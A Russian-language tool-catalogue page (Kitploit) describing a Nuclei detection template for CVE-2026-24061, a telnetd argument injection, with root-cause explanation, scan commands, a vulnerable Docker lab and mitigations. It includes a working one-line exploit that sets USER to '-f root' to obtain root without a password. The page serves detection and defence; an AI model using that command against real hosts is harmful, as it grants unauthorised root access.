Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-24061 — Nuclei template for detecting CVE-2026-24061, a critical telnet argument injection in GNU inetutils telnetd allowing unauthenticated root access. | Kitploit
Инструменты/GitHubGitHub/mr-zapi/cve-2026-24061
Vulnerability ScannersExploitationWeb Application ExploitationNetwork SecurityPenetration TestingLearning & Education
GitHubmr-zapi/cve-2026-24061

CVE-2026-24061

Nuclei template for detecting CVE-2026-24061, a critical telnet argument injection in GNU inetutils telnetd allowing unauthenticated root access.

Репозиторий
17 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-24061 - Telnet Argument Injection

Nuclei template для обнаружения уязвимости CVE-2026-24061 в GNU inetutils telnetd, позволяющей получить root доступ без аутентификации.

📋 Описание уязвимости

CVE-2026-24061 - это критическая уязвимость argument injection в GNU inetutils telnetd, которая позволяет атакующему получить root shell без знания пароля.

Как это работает?

  1. Корень проблемы: В 2015 году в telnetd был добавлен новый шаблон логина с динамическим параметром %U:
root@kitploit:~
   /usr/bin/login -p -h %h %?u{-f %u}{%U}
  1. Уязвимость: Переменная окружения USER передаётся через telnet протокол (RFC 1572 NEW-ENVIRON) и не санитизируется перед подстановкой в команду.

  2. Эксплуатация: Атакующий устанавливает USER="-f root" при подключении:

root@kitploit:~
   USER="-f root" telnet -a target.com 23
  1. Результат: Команда логина превращается в:
root@kitploit:~
   /usr/bin/login -p -h hostname -f root

Флаг -f означает "skip authentication" → root без пароля 💀

🎯 Затронутые версии

  • GNU inetutils telnetd с уязвимым шаблоном логина
  • Например: inetutils-telnetd 2:2.0-1+deb11u2
  • Системы где telnetd использует автологин без Kerberos

🚀 Использование

Базовое сканирование

root@kitploit:~
nuclei -t cve-2026-24061.yaml -u target.com:23 -code

Множественные цели

root@kitploit:~
nuclei -t cve-2026-24061.yaml -l targets.txt -code

🔬 Тестовая лаборатория

Для тестирования можно поднять уязвимый Docker контейнер:

root@kitploit:~
FROM debian:11-slim

ENV DEBIAN_FRONTEND=noninteractive

RUN apt-get update && \
    apt-get install -y --no-install-recommends \
      inetutils-telnetd=2:2.0-1+deb11u2 \
      telnet && \
    rm -rf /var/lib/apt/lists/*

RUN useradd user1 && \
    sed -i 's/#<off># telnet/telnet/' /etc/inetd.conf

EXPOSE 23

CMD ["/usr/sbin/inetutils-inetd", "-d"]

Запуск:

root@kitploit:~
# Собрать образ
docker build -t vuln-telnetd .

# Запустить
docker run -d -p 2323:23 vuln-telnetd

# Проверить уязвимость
nuclei -t cve-2026-24061.yaml -u 127.0.0.1:2323 -code -v

🛡️ Защита

  1. Обновить inetutils до исправленной версии
  2. Отключить telnetd и использовать SSH
  3. Фильтровать порт 23 на файрволе
  4. Мониторить подключения к telnet

📚 Ссылки

  • NVD - CVE-2026-24061
  • SafeBreach Labs - Root Cause Analysis

📊 CVSS Score

9.8 / 10 - Critical

root@kitploit:~
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • AV:N - Network (атака по сети)
  • AC:L - Low complexity (легко эксплуатировать)
  • PR:N - No privileges required (не нужна аутентификация)
  • UI:N - No user interaction (автоматическая эксплуатация)
  • C:H/I:H/A:H - High impact на конфиденциальность, целостность и доступность

⚠️ Дисклеймер

Этот инструмент предназначен только для легального тестирования безопасности систем, на которые у вас есть явное разрешение.

Автор не несёт ответственности за неправомерное использование данного шаблона.

👤 Автор

Created by Mr.Zapi

Скачать инструмент